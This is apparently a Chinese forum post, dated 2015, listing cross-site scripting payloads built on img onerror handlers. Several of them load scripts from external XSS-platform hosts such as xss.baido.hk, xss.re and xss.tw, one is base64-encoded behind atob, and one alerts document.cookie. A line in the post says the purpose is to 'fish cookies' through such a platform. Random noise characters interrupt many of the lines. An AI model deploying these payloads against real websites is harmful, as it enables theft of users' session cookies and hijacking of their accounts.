<img src='non-exist.jpg'onerror="alert('xss')">
% j3 x G/ F: P3 y% U* o<img src=# onerror=alert(123)>
# r: \/ R H8 ]# Q<img src=# onerror=alert(document.cookie)>) _# n. V C6 A+ B$ ^- A" Y
下面是利用平台钓cookie的- B! N6 H. x3 A& ?8 O* k
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>; \( ^% x9 C# }# y5 U& u
! J0 s2 w! [& |: ~) L* a5 n' w; J1 \" }4 i" Z, }
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
6 u8 n. w8 F5 r. t<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>: `- J5 t5 N' R' r5 U
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
) i( @( S- P3 t: ^/ {<img src=1 onerror=jQuery.getScript("//xss.re/974")>
/ v% p4 u& N, C- h<img src="#">4 ?8 b: w1 i; Q! ]* l) P/ Z
<img src="#">
; N: N; a: J' r! ?$ |+ E5 d& w5 f<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
. ~% ?$ f7 V+ T<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
5 R3 g, l V# A" ~<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
& S4 f" U% \0 A, R; z<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
( |% R) L+ v4 d<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>; M0 Z4 P$ k9 `+ j4 n
<img src=x width="0" height="0"></img>
- d7 O- a& ]4 j, u) C; H<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
3 i$ x6 D C7 ?) O<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>; g( K" B$ A B+ A$ l) z
|
发表于 2015-10-18 14:33:54
收藏
支持
反对